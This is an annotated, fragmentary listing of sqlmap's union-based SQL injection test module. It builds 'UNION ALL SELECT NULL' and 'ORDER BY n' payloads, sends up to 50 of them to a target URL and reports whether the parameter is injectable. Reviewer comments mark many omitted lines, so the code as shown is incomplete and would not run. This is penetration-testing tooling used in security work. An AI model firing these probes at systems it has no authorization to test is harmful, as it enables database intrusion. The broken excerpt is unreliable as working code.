$Id: test.py 327 2009-01-12 21:35:38Z inquisb $
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from lib.core.agent import agent
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.session import setUnion
from lib.request.connect import Connect as Request
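def __forgeUserFriendlyValue(payload):
    """
    Render the request that carried ``payload`` as a human-readable
    string, laid out according to where the injection point sits
    (``kb.injPlace``).

    GET yields ``<conf.url>?<payload>`` on one line; POST, Cookie and
    User-Agent yield a two-line ``URL:`` / ``<place>:`` block. Any other
    place yields an empty string.

    The URL and the payload are interpolated verbatim: no encoding or
    escaping is applied here, so the result is presumably meant for
    display rather than for replaying as a request.
    """

    # Start from a defined value: with an unrecognised kb.injPlace none of
    # the branches below assigns anything.
    value = ""

    if kb.injPlace == "GET":
        # NOTE(review): if conf.url already carries a query string this
        # yields a second "?" -- confirm what conf.url holds at this point.
        value = "%s?%s" % (conf.url, payload)
    elif kb.injPlace in ("POST", "Cookie", "User-Agent"):
        # The "User-Agent:" label is wider than one tab stop, so its URL
        # line takes a second tab to keep both quoted values aligned.
        if kb.injPlace == "User-Agent":
            urlGap = "\t\t"
        else:
            urlGap = "\t"

        value = "URL:%s'%s'" % (urlGap, conf.url)
        value += "\n%s:\t'%s'\n" % (kb.injPlace, payload)

    # Both callers in this module assign the result, so always hand back
    # the string that was built.
    return value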
def __unionTestByNULLBruteforce(comment):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 50 columns
    on the target database table

    Each pass wraps the current UNION query with ``comment`` through
    agent.postfixQuery(), turns it into a payload with agent.payload()
    and sends it with Request.queryPage(..., getSeqMatcher=True).

    On the receiving side this shows up as a burst of up to 50 requests
    whose injected parameter carries ``UNION ALL SELECT NULL``,
    presumably with a growing NULL list (the append is not shown here).

    NOTE(review): this listing omits several lines of the function; the
    gaps are marked below with their original line numbers.
    """

    # [listing gap: original lines 59-62 not shown]
    query = agent.prefixQuery(" UNION ALL SELECT NULL")

    # [listing gap: original line 64 not shown]
    for count in range(0, 50):
        # Strip a trailing " FROM DUAL" left on the query so that it is not
        # duplicated when the Oracle suffix is handled again below.
        if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
            query = query[:-len(" FROM DUAL")]

        # [listing gap: original lines 68-71 not shown]
        if kb.dbms == "Oracle":
            # [listing gap: original lines 73-74 not shown; the body of this
            # test is among them, presumably re-appending " FROM DUAL"]

        commentedQuery = agent.postfixQuery(query, comment)
        payload = agent.payload(newValue=commentedQuery)
        seqMatcher = Request.queryPage(payload, getSeqMatcher=True)

        # [listing gap: original lines 78-80 not shown; presumably the test on
        # seqMatcher that guards the next line]
        value = __forgeUserFriendlyValue(payload)
        # [listing gap: original lines 82-87 not shown; presumably the loop
        # exit and the return statement]
def __unionTestByOrderBy(comment):
    """
    Probe the injection point with ``ORDER BY 1`` .. ``ORDER BY 50`` and
    return a ``(value, columns)`` pair.

    Each pass builds the clause with agent.prefixQuery(), appends
    ``comment`` through agent.postfixQuery(), turns it into a payload with
    agent.payload() and sends it with
    Request.queryPage(..., getSeqMatcher=True).

    On the receiving side this shows up as up to 50 consecutive requests
    whose injected parameter carries ``ORDER BY`` followed by an
    increasing integer.

    NOTE(review): this listing omits several lines of the function; the
    gaps are marked below with their original line numbers. ``columns`` is
    returned but never assigned in the visible lines.
    """

    # [listing gap: original lines 89-91 not shown; presumably the initial
    # values of value, columns and prevPayload]
    for count in range(1, 51):
        query = agent.prefixQuery(" ORDER BY %d" % count)
        orderByQuery = agent.postfixQuery(query, comment)
        payload = agent.payload(newValue=orderByQuery)
        seqMatcher = Request.queryPage(payload, getSeqMatcher=True)

        # [listing gap: original lines 97-101 not shown; presumably the test
        # on seqMatcher that guards the next line]
        # The reported value is built from the payload of the previous pass,
        # not from the one just sent.
        value = __forgeUserFriendlyValue(prevPayload)

        # [listing gap: original lines 103-105 not shown]
        # Remember this pass's payload for the next iteration.
        prevPayload = payload

    # [listing gap: original line 107 not shown]
    return value, columns
# [listing gap: original lines 109-112 not shown; the ``def`` line of the
# function this body belongs to is presumably among them]
"""
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 3*50 times
"""

# [listing gap: original lines 115-116 not shown]
# Human-readable name of the column-counting technique selected by
# conf.uTech; it is interpolated into the log message below.
if conf.uTech == "orderby":
    technique = "ORDER BY clause bruteforcing"
# [listing gap: original line 119 not shown; presumably the ``else:`` that
# makes the next assignment the fallback rather than an override]
technique = "NULL bruteforcing"

logMsg = "testing inband sql injection on parameter "
logMsg += "'%s' with %s technique" % (kb.injParameter, technique)

# [listing gap: original lines 124-128 not shown; presumably where logMsg is
# emitted]
# Try the DBMS-specific comment string first, then no comment suffix at all.
# NOTE(review): the docstring says 3*50, but this tuple has two entries and
# each helper loops 50 times -- confirm which figure is current.
for comment in (queries[kb.dbms].comment, ""):
    if conf.uTech == "orderby":
        value, columns = __unionTestByOrderBy(comment)
    # [listing gap: original line 132 not shown; presumably the ``else:``
    # selecting the NULL technique]
    value, columns = __unionTestByNULLBruteforce(comment)

    # [listing gap: original lines 134-135 not shown; presumably the test
    # that guards the next line]
    # Hands the comment string and column count to lib.core.session.
    setUnion(comment, columns)

# [listing gap: original lines 137-140 not shown]
# Message for the positive outcome; the call that emits it is not shown.
logMsg = "the target url could be affected by an "
logMsg += "inband sql injection vulnerability"

# [listing gap: original lines 143-144 not shown]
# Message for the negative outcome; the call that emits it is not shown.
warnMsg = "the target url is not affected by an "
warnMsg += "inband sql injection vulnerability"